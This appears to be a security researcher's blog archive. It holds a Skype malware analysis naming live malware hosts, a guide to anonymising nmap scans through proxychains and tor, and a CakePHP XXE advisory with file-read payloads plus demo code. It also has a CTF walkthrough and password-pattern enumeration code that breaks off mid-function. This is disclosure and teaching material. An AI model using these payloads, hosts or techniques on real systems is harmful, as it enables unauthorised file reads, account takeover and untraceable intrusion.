The blog for a project that I'm a part of has finally been published: <a href="http://browser-shredders.blogspot.com/" target="_blank">http://browser-shredders.blogspot.com</a>. The research started some time ago, and we already have some nice findings. Currently there is not much content, but this will change after the Hack in The Box talk, which will be presented by my two colleagues: <a href="http://haxpo.nl/hitb2014ams-pilorz-zmyslowski/" target="_blank">http://haxpo.nl/hitb2014ams-pilorz-zmyslowski/</a>.<br />
<br />
<b>ZDI-13-252 - Cogent DataHub Heap Overflow Remote Code Execution Vulnerability</b> (2013-11-25)<br />
Zero Day Initiative (ZDI) has published an advisory for a heap overflow vulnerability in Cogent DataHub which I found a few months ago. The full advisory can be read here: <a href="http://zerodayinitiative.com/advisories/ZDI-13-252/" target="_blank">ZDI-13-252</a>.<br />
<br />
Earlier this year I also found some null pointer dereference bugs leading to a denial of service in DataHub. I will post some PoCs soon.<br />
<br />
<b>Funny sudo bug</b> (2013-09-03)<br />
Around a month ago I was performing a task where I needed to create a user with a very large UID in the system. The required UID happened to be <b>2147483648 (0x80000000)</b> exactly.<br />
<br />
<blockquote class="tr_bq">
root@hive:~# adduser -u 2147483648 test1</blockquote>
Next I switched to the newly created user and typed sudo.<br />
<blockquote class="tr_bq">
test1@hive:/$ su test1 <br />
test1@hive:/$ sudo
</blockquote>
And this was the result:
<br />
<blockquote class="tr_bq">
test1@hive:/$ sudo <br />
sudo: perm stack underflow: Invalid argument <br />
sudo: unknown uid: 2147483647 <br />
Segmentation fault </blockquote>
We can see here that the UID value was wrapped to 2147483647 (0x7fffffff), followed by a segfault.<br />
<br />
We can have some fun with it, e.g. creating a user with the 0x7fffffff UID. This way sudo will no longer crash, but it will be called for a different user : ). The bug was tested on version 1.8.5p2 on a 32-bit OS. Additional details can be found in the <a href="http://www.sudo.ws/bugs/show_bug.cgi?id=609" target="_blank">bug report</a>.<br />
<br />
<b>Skype Malware Analysis</b> (2013-03-18)<br />
When I came back from work today and fired up Skype, multiple messages popped up immediately. Some of them were in English and some in Polish, but all led to the same URL with "pictures" of me ; oo. Another interesting fact was that all the messages came from people working at the same company (zomg APT alert ;D).<br />
<br />
The messages looked like this:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCd0yaLELe_qQiypp8GWO83X1qFjGvax8anrhUKhJyOlElKKLPexPD_1upQITFXHuAL14pQvDk4N56fK3GpJ7pbqiM5_k-9kLT9IFloVzOfFxEJt8KlpPf1FMCfUwHw6JdAnYz2gadU_8/s1600/1_blog.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="149" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCd0yaLELe_qQiypp8GWO83X1qFjGvax8anrhUKhJyOlElKKLPexPD_1upQITFXHuAL14pQvDk4N56fK3GpJ7pbqiM5_k-9kLT9IFloVzOfFxEJt8KlpPf1FMCfUwHw6JdAnYz2gadU_8/s320/1_blog.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td class="tr-caption" style="font-size: 13px;">Messages in English and Polish encouraging to visit the links</td></tr>
</tbody></table>
</td></tr>
</tbody></table>
We check what is behind the URL shortener:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4ZXxRkepZWW-6rrgzFnsTDrP1cbEd1JblJVi_50qYtxUTKvjedbI3A6JRzFpoqowi8eIISIRIUfKh8t-pyC5HH_QooE7TlonsOID4k1T3P7G5gUA0xP8Yf_5uoLpsX6gQJiumbofDklU/s1600/2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4ZXxRkepZWW-6rrgzFnsTDrP1cbEd1JblJVi_50qYtxUTKvjedbI3A6JRzFpoqowi8eIISIRIUfKh8t-pyC5HH_QooE7TlonsOID4k1T3P7G5gUA0xP8Yf_5uoLpsX6gQJiumbofDklU/s400/2.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">zip file !</td></tr>
</tbody></table>
Crunchpress seems to be a 'hacked' website:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_i2y5EUXvNETW8IwgXDHA5KWK2oWuYIis6_TJlOPQLbZKJmFTsSSwYbGZyp3z0zRE0Mc2FiCldRbJz07qVRAlaCKbuwYF_WgvJj7sPPbwKzIRHo_SXnWjDKREN4_XKLlwdNTQwfrM-0o/s1600/5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_i2y5EUXvNETW8IwgXDHA5KWK2oWuYIis6_TJlOPQLbZKJmFTsSSwYbGZyp3z0zRE0Mc2FiCldRbJz07qVRAlaCKbuwYF_WgvJj7sPPbwKzIRHo_SXnWjDKREN4_XKLlwdNTQwfrM-0o/s320/5.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">crunchpress image folder with some additional content</td></tr>
</tbody></table>
Let's download and unzip it:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjVR4LOfPqV6jMy9jcZuDzGs3KkhBUZEQESJxwcr64USu07pnrrWlf1WVRn_Vg83VzYwoAg9tLpwgUm87wHIacVNgzivHj_vkTCoXd72j5l5di1991NGyftcTlRHJKKK12hQeyU_jvv4Q/s1600/3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjVR4LOfPqV6jMy9jcZuDzGs3KkhBUZEQESJxwcr64USu07pnrrWlf1WVRn_Vg83VzYwoAg9tLpwgUm87wHIacVNgzivHj_vkTCoXd72j5l5di1991NGyftcTlRHJKKK12hQeyU_jvv4Q/s320/3.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Oh noez! no pics just exe : (</td></tr>
</tbody></table>
A quick scan at virustotal.com gives 7/44 and identifies the file as a dropper:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5ui00XJ2-aAn4uQ2t1FDfUXK5bS4xDuWkJhmvfLp-C9ogW8oIkUqU21QUdTrcg90kwcGt-ObwthxX778p2IbOYadbuPG7GcU9xHVN9tGJMdr8wFjV7RWwXaA61LX56WFUCpwMBtOOYN0/s1600/4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5ui00XJ2-aAn4uQ2t1FDfUXK5bS4xDuWkJhmvfLp-C9ogW8oIkUqU21QUdTrcg90kwcGt-ObwthxX778p2IbOYadbuPG7GcU9xHVN9tGJMdr8wFjV7RWwXaA61LX56WFUCpwMBtOOYN0/s320/4.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">virustotal results</td></tr>
</tbody></table>
Not surprisingly, it downloads something over HTTP:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5pvc82KZHDVNyHBzAWjynBbRHtiT8h2EPwjqz9r-1DVjvD36qG1JAkWfTk-W4OPLyO-NA0i-FZc1zLan8Nt1O8gmYpB0av95MY3HALTrQKni9-f3oY7IQeeCzY8ZsTmxyCMS3xIClc4A/s1600/traffic.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5pvc82KZHDVNyHBzAWjynBbRHtiT8h2EPwjqz9r-1DVjvD36qG1JAkWfTk-W4OPLyO-NA0i-FZc1zLan8Nt1O8gmYpB0av95MY3HALTrQKni9-f3oY7IQeeCzY8ZsTmxyCMS3xIClc4A/s320/traffic.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Actual bad stuff downloaded here</td></tr>
</tbody></table>
Let's see what we have there. First, a quick geolocation request:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU7_rHE7nSo8pHNtZeXxYPCKPN84gFrrM8-_pypssHv5wHKHi79AG2w8Pz37nN-YuXMHQsqjTmxEwCtcbe5FJBijS7cjTtenyFOedWhgWI8lNNzZxJfMkpTCQ6OnhIhJvvCBIPkEnyVKY/s1600/geoloc.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjU7_rHE7nSo8pHNtZeXxYPCKPN84gFrrM8-_pypssHv5wHKHi79AG2w8Pz37nN-YuXMHQsqjTmxEwCtcbe5FJBijS7cjTtenyFOedWhgWI8lNNzZxJfMkpTCQ6OnhIhJvvCBIPkEnyVKY/s1600/geoloc.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">hi ho</td></tr>
</tbody></table>
Next, a list of 'unwanted' domain names is downloaded (full list available <a href="http://howl.overflow.pl/skype.txt" target="_blank">here</a>).<br />
<br />
<a name='more'></a><div>
Risold.de, where the file n.txt is hosted, looks like another pwned web server.</div>
<div>
<br /></div>
<div>
Now we have three PE files downloaded from different locations:</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs1m4TJTudKLEVql3pZ5vnxR3htwMiRIhG7bU9bUt-6Y5QXi9PXrpsK0P6_lKfx9ZgHoTKYNKdLwYXvlTbFFQ9DWtwU1Hz9irxUg-B7Lk1YyyolX5WkWyrN6D_B2O4YvGhnBoz2iwGAHM/s1600/pureevil.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhs1m4TJTudKLEVql3pZ5vnxR3htwMiRIhG7bU9bUt-6Y5QXi9PXrpsK0P6_lKfx9ZgHoTKYNKdLwYXvlTbFFQ9DWtwU1Hz9irxUg-B7Lk1YyyolX5WkWyrN6D_B2O4YvGhnBoz2iwGAHM/s320/pureevil.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">file number 2</td></tr>
</tbody></table>
<div>
The detection ratio is higher (14/45), and the file is recognized as a generic trojan:</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjsCiZuAChUhFzmvOmFtHU1TQ-jJlFdPGSIgNXlvaqU_7hfcS9m0r527JfvOa9YC0CTLTEWi16LTCPJarTAyv40hedvWhdXEDYYavvVkQHY83BzOi906kNOjr6gcSbv0akW-0fF1euqrM/s1600/virustotal2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjsCiZuAChUhFzmvOmFtHU1TQ-jJlFdPGSIgNXlvaqU_7hfcS9m0r527JfvOa9YC0CTLTEWi16LTCPJarTAyv40hedvWhdXEDYYavvVkQHY83BzOi906kNOjr6gcSbv0akW-0fF1euqrM/s320/virustotal2.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">fbp.exe virustotal ratio</td></tr>
</tbody></table>
<div>
Both files seem to have been built on the same machine by the same Visual C++ user, as they contain the following string:</div>
<blockquote class="tr_bq">
C:\Users\Samim\Desktop\Stab\stb\Release\stb.pdb</blockquote>
The site hosting the fbp.exe is some Indian company.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoFZK50WPGXCDKKa6kNWSMyUkY3vAtuTYQwEOAfNvOvVYo-m0Ys4DTttoVV3UdPgG4fvpXP0bCsZSYrEDqmhSOpKJ7AkN8ilXa3YGG6fPAsCsID4wmDjp-UKj2d91-merW5mpIcdtfa8E/s1600/india.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoFZK50WPGXCDKKa6kNWSMyUkY3vAtuTYQwEOAfNvOvVYo-m0Ys4DTttoVV3UdPgG4fvpXP0bCsZSYrEDqmhSOpKJ7AkN8ilXa3YGG6fPAsCsID4wmDjp-UKj2d91-merW5mpIcdtfa8E/s320/india.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">site hosting malware</td></tr>
</tbody></table>
Ok, now the third file. This one is different, hosted on hotfile.com:<br />
<br />
<ul>
<li>http://hotfile.com/dl/198796835/3487ec8/f.exe.html</li>
</ul>
<br />
It is only detected by Kaspersky as a "UDS:DangerousObject.Multi.Generic".<br />
<br />
In the packet capture I was also able to observe some IRC-like communication on port 1863.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjUAkJVTNHCKNbGYdFtndrQs-8-4trx3AeXZpEUIKeEXlulg0ZQe-qHe0S3lKQEZZFkygnCewy5GPHvPVHdOM7TvpNBOudFtGYtJfTY1Di_4o3mghMitFcaKU7tDq49NJKSIkOViw25iw/s1600/ircalike.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjUAkJVTNHCKNbGYdFtndrQs-8-4trx3AeXZpEUIKeEXlulg0ZQe-qHe0S3lKQEZZFkygnCewy5GPHvPVHdOM7TvpNBOudFtGYtJfTY1Di_4o3mghMitFcaKU7tDq49NJKSIkOViw25iw/s320/ircalike.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRC ?</td></tr>
</tbody></table>
The xixbh.net domain resolves to this IP (China ;D). That explains the strange characters. So this is probably the C&C of an IRC-managed botnet. I will stop here : ).<br />
<br />
This was just a quick analysis, and it is a bit chaotic (sorry for that). If I find some free time, a follow-up with the analysis of the executables will show up here.Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-45004160709385949452012-09-18T22:28:00.000+02:002012-09-18T22:28:11.476+02:00Anonymous port scanning using proxychains and torWhen testing a web application or doing reconnaissance, the Tor Browser Bundle is all we need to hide our true identity, but what about other activities? In this short post I will explain how to stay anonymous during port scanning. We will need the following tools to achieve this goal:<br />
<br />
<ul>
<li>tor,</li>
<li>proxychains,</li>
<li>nmap. </li>
</ul>
<div>
Proxychains is a proxifier supporting HTTP, SOCKS4 and SOCKS5 proxies. It is shipped with BackTrack Linux by default and already configured to use tor. You can verify this by looking at /etc/proxychains.conf; the last line should look like this:</div>
<div>
<script src="https://gist.github.com/3745472.js?file=proxychains.conf"></script></div>
<br />
We are ready to fire up nmap:<br />
<script src="https://gist.github.com/3745529.js?file=scan.sh"></script><br />
<br />
Now, let me explain what happened there. We run nmap through proxychains with the following options:<br />
<br />
<ul>
<li>-sT - full TCP connection scan</li>
<li>-PN - do not perform host discovery</li>
<li>-n - never perform DNS resolution (to prevent DNS leaks from tor)</li>
<li>-sV - determine service version/info</li>
<li>-p - ports to scan (for testing purposes I only gave 3 ports to scan; proxying a port scan through tor makes it really slow, so perhaps the --top-ports option should be taken into consideration)</li>
<li>&lt;host ip&gt; - self explanatory</li>
</ul>
In the scan log we can see the "chain" that goes from 127.0.0.1:9050 (tor proxy) to our scanned host. It is possible that we will encounter a situation where this scan fails, because tor exit nodes are often blocked (the reason is spam or other malicious activity). The solution may be adding a common, public proxy to the "chain". We can do that by simply editing proxychains.conf and adding a new entry at the end of the [ProxyList] section (be sure that the random_chain option is disabled).<br />
<br />
That's all for tonight, I hope somebody will find this information useful.Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com1tag:blogger.com,1999:blog-4014979627879654228.post-18458021621661824802012-07-16T00:14:00.000+02:002012-09-07T19:09:54.911+02:00CakePHP 2.x XXE injection<br />
<blockquote class="tr_bq">
# Exploit title: CakePHP XXE injection <br />
# Date: 01.07.2012 <br />
# Software Link: http://www.cakephp.org <br />
# Vulnerable version: 2.x - 2.2.0-RC2 <br />
# Tested on: Windows and Linux <br />
# CVE: CVE-2012-4399 <br />
# Author: Pawel Wylecial <br />
# http://h0wl.pl </blockquote>
<div>
1. Background</div>
<div>
<br /></div>
<div>
Short description from the project website: "CakePHP makes building web applications simpler, faster and require less code."</div>
<div>
<br /></div>
<div>
2. Vulnerability</div>
<div>
<br /></div>
<div>
CakePHP is vulnerable to XML eXternal Entity (XXE) injection. The class responsible for building XML (it uses PHP SimpleXML) resolves external entities, which allows local file inclusion.</div>
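<div>
Added example, not CakePHP's own code: a minimal PHP handler that parses a request body with SimpleXML in the permissive way that makes the advisory's PoC work (LIBXML_NOENT substitutes the external entity with the referenced file's contents) next to a hardened parse that rejects any DOCTYPE and never substitutes entities. The function names, the temporary stand-in file and the assumption of a Unix-style path are mine, and the hardened variant is a generic mitigation, not the fix the project shipped.</div>

```php
<?php
// Added example, not CakePHP's code: the same XML body parsed with a
// permissive SimpleXML call and with a hardened one. Function names and
// the temporary file are assumptions made for this demo.

// Constructed stand-in for /etc/passwd so the demo is self-contained
// (assumes a Unix-style path so the file:// URL resolves as expected).
$secretFile = tempnam(sys_get_temp_dir(), 'xxe');
file_put_contents($secretFile, "secret-file-contents");

// Same shape as the advisory's PoC: a DOCTYPE declaring an external entity
// that is then referenced inside the request body.
$attackBody = '<!DOCTYPE cakephp [<!ENTITY payload SYSTEM "file://' . $secretFile . '">]>'
            . '<request><xxe>&payload;</xxe></request>';

// A legitimate body with no DTD at all, the only kind an API needs to accept.
$cleanBody = '<request><xxe>hello</xxe></request>';

// Permissive parse. LIBXML_NOENT tells libxml to substitute entities, and for
// an external entity that means loading the referenced file into the
// document, so the secret ends up in $doc->xxe.
function parsePermissive(string $xml): ?SimpleXMLElement
{
    libxml_use_internal_errors(true);
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);
    return $doc === false ? null : $doc;
}

// Hardened parse: refuse any DOCTYPE (that is where entities get declared),
// never pass LIBXML_NOENT, forbid network fetches with LIBXML_NONET, and on
// PHP < 8.0 also switch the external entity loader off while parsing.
function parseHardened(string $xml): ?SimpleXMLElement
{
    if (preg_match('/<!DOCTYPE/i', $xml) === 1) {
        return null; // untrusted input has no business shipping a DTD
    }
    $previous = null;
    if (PHP_VERSION_ID < 80000) {
        $previous = libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);
    $doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    if ($previous !== null) {
        libxml_disable_entity_loader($previous);
    }
    return $doc === false ? null : $doc;
}

// Renders the outcome of one parser/body pair as a single line.
function describe(?SimpleXMLElement $doc): string
{
    return $doc === null ? 'rejected' : 'xxe = "' . (string) $doc->xxe . '"';
}

echo "permissive + attack body: " . describe(parsePermissive($attackBody)) . PHP_EOL;
echo "hardened   + attack body: " . describe(parseHardened($attackBody)) . PHP_EOL;
echo "hardened   + clean body:  " . describe(parseHardened($cleanBody)) . PHP_EOL;

unlink($secretFile);
```

The permissive line shows the stand-in file's contents inside the parsed document, which is exactly the read the advisory describes; the hardened parser refuses the DTD-carrying body but still accepts the plain one.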
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
<br /></div>
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
3. Proof of Concept</div>
<br />
<div class="line alt1" style="background-image: none !important; border: 0px !important; bottom: auto !important; direction: ltr !important; float: none !important; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; height: auto !important; left: auto !important; line-height: 15px; margin: 0px !important; outline: 0px !important; padding: 0px !important; position: static !important; right: auto !important; text-align: left; top: auto !important; vertical-align: baseline !important; width: auto !important;">
Linux:<br />
<!DOCTYPE cakephp [<br />
<!ENTITY payload SYSTEM "file:///etc/passwd" >]><br />
<request><br />
<xxe>&payload;</xxe><br />
</request><br />
<br />
Windows:<br />
<!DOCTYPE cakephp [<br />
<!ENTITY payload SYSTEM "file:///C:/boot.ini" >]><br />
<request><br />
<xxe>&payload;</xxe><br />
</request><br />
<br />
4. Fix<br />
<br />
Fixed in versions 2.1.5 and 2.2.1. See the official security release:<br />
<a href="http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1">http://bakery.cakephp.org/articles/markstory/2012/07/14/security_release_-_cakephp_2_1_5_2_2_1</a>
<br />
<br />
5. Timeline<br />
<br />
1.07.2012 - vulnerability reported<br />
13.07.2012 - response from CakePHP<br />
14.07.2012 - confirmed and fix released</div>
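To show the mechanism behind the PoC above outside of PHP, here is an added example (not CakePHP code) that runs the same document through Python's standard-library SAX parser, once with external general entities enabled, which is the behaviour of an unhardened libxml-based parser such as the one the Xml class wrapped, and once with them disabled. The target file, its name and its contents are constructed for the demo; the document shape is the advisory's PoC with the SYSTEM identifier filled in.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges

# Same document shape as the advisory's PoC; only the SYSTEM identifier varies.
XXE_TEMPLATE = (
    '<!DOCTYPE cakephp [\n'
    '<!ENTITY payload SYSTEM "{url}" >]>\n'
    '<request>\n'
    '<xxe>&payload;</xxe>\n'
    '</request>\n'
)


def build_xxe_document(file_url):
    """Return the PoC request body with the external entity pointed at file_url."""
    return XXE_TEMPLATE.format(url=file_url)


class XxeCollector(ContentHandler):
    """Collects the text that ends up inside the xxe element, i.e. what the
    application would store or echo back after parsing the request."""

    def __init__(self):
        super().__init__()
        self._inside = False
        self.parts = []

    def startElement(self, name, attrs):
        if name == "xxe":
            self._inside = True

    def endElement(self, name):
        if name == "xxe":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self.parts.append(content)


def parse_request(xml_text, resolve_external_entities):
    """Parse a request body and return the text of the xxe element.

    resolve_external_entities=True makes the parser fetch SYSTEM entities,
    which is the vulnerable behaviour; False is the hardened setting.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external_entities)
    handler = XxeCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return "".join(handler.parts)


def demo():
    """Create a constructed stand-in for /etc/passwd and attack it both ways."""
    secret = "root:x:0:0:root:/root:/bin/bash"        # constructed sample line
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(secret)
        path = f.name
    try:
        doc = build_xxe_document("file://" + path)
        return {
            "vulnerable": parse_request(doc, resolve_external_entities=True),
            "hardened": parse_request(doc, resolve_external_entities=False),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for mode, text in demo().items():
        print(f"{mode}: {text!r}")
```

With the feature enabled the file's first line comes back as the element's text; with it disabled the entity expands to nothing. The PHP equivalent of the hardened branch is to keep libxml's external entity loader disabled for untrusted input (libxml_disable_entity_loader(true) on PHP 7; external entity loading is off by default since PHP 8.0) and never to pass LIBXML_NOENT when parsing it.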
Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com1tag:blogger.com,1999:blog-4014979627879654228.post-45831823190696216962012-06-13T23:57:00.004+02:002012-06-19T13:11:53.299+02:00exploit-exercises.com walkthrough - Nebula level02So here's our challenge: <a href="http://exploit-exercises.com/nebula/level02">http://exploit-exercises.com/nebula/level02</a>.<br />
<br />
The value of the USER environment variable is copied into a buffer without any checking, and the buffer content is then executed with a system() call. So we just need to put "proper" content into the USER environment variable and we are good to go:<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJPVTr-B8bfNlK-W4AkOxei1x0JWlTl3ML906lFF_YajGJ7-0LlE-SQAQOLrUMW0W4mnuRulpDP7lw1BEsvUN9HRZhEHUfPHG3IdqG0ZRM11pj4Pz9zSJqCGUsj6jJtWhu8L1hCzRNhHA/s1600/walkthrough.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgJPVTr-B8bfNlK-W4AkOxei1x0JWlTl3ML906lFF_YajGJ7-0LlE-SQAQOLrUMW0W4mnuRulpDP7lw1BEsvUN9HRZhEHUfPHG3IdqG0ZRM11pj4Pz9zSJqCGUsj6jJtWhu8L1hCzRNhHA/s1600/walkthrough.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">level02 walkthrough.</td></tr>
</tbody></table>
And that's all :)Pawel Wylecialhttp://www.blogger.com/profile/10114474176396848494noreply@blogger.com0tag:blogger.com,1999:blog-4014979627879654228.post-39669748901102900852012-06-06T18:08:00.003+02:002012-06-06T18:08:45.279+02:00How to NOT implement password reminder functionA quick post about my recent discovery. I created an account on some website and wanted to use its password reminder. There was only one step: provide the e-mail address used to register.<br />
<br />
My first surprise was that the password was changed immediately, without any confirmation step. That means that knowing only a person's e-mail address, I could change their password!<br />
<br />
The second surprise was the pattern that emerged when I generated a few passwords (for different accounts, each with a different password):<br />
<blockquote class="tr_bq" style="font-family: "Courier New",Courier,monospace;">
XS?dh*96<br />
NJ*fz!45<br />
KX$mm!73<br />
ZE*wx*98<br />
PJ*fg?93<br />
ZC?gb?4<br />
JU!ig*80<br />
YZ*vz@95<br />
DD@fy@70<br />
MX*em%72<br />
DM%cn%17</blockquote>
<span style="font-family: inherit;">[2 uppercase letters][special char][2 lowercase letters][special char][number, at most 2 digits]</span>.<br />
<br />
Can you spot the problem ?<br />
<ul>
<li>I am able to change someone's password knowing only his e-mail,</li>
<li>I know the generation pattern for this new password.</li>
</ul>
Based on those rules we can generate a wordlist and try to guess the password. In this case it is not critical, because every guess has to go through the web application (an online attack), which is slow. We have:<br />
26 x 26 x 6 x 26 x 26 x 6 x 100 = 1,645,113,600 possible combinations (six different special characters were observed, and the pattern uses two of them), so a wordlist with one candidate per line would be around 15 GB. Yes, that means a lot of time, but if there are flaws in the randomness of the string generation, the time needed could probably be shortened considerably; I need to examine it more deeply. To sum up, it does not seem to be a threat (for now), but such patterns definitely should not appear in a password reminder function.<br />
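As an added example (not code from the original post), here is what an attacker would do with the pattern in Python: check it against the sampled passwords, size the keyspace and the resulting wordlist, and enumerate the candidates lazily instead of writing a multi-gigabyte file. The guess rate passed to seconds_to_exhaust() is an assumption, not something measured against the site.

```python
import itertools
import re
import string

# The reminder passwords quoted in the post.
SAMPLES = [
    "XS?dh*96", "NJ*fz!45", "KX$mm!73", "ZE*wx*98", "PJ*fg?93", "ZC?gb?4",
    "JU!ig*80", "YZ*vz@95", "DD@fy@70", "MX*em%72", "DM%cn%17",
]

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
SPECIAL = "?*!$@%"             # the six symbols that occur in the samples
PATTERN = re.compile(r"^[A-Z]{2}[?*!$@%][a-z]{2}[?*!$@%]\d{1,2}$")


def matches_pattern(password):
    """True if a password has the observed shape."""
    return PATTERN.match(password) is not None


def keyspace():
    """Distinct passwords the generator can produce under the pattern; the
    number part is 0-99 printed without a leading zero (as in 'ZC?gb?4')."""
    return 26 * 26 * len(SPECIAL) * 26 * 26 * len(SPECIAL) * 100


def wordlist_bytes():
    """Size of a one-candidate-per-line wordlist: for every prefix, 10 of the
    100 numbers are one digit (7 chars + newline) and 90 are two (8 + newline)."""
    return keyspace() // 100 * (10 * 8 + 90 * 9)


def candidates():
    """Lazily enumerate the whole keyspace in a fixed order, so an attack
    tool can stream it instead of storing a multi-gigabyte file."""
    for u1, u2, s1, l1, l2, s2, n in itertools.product(
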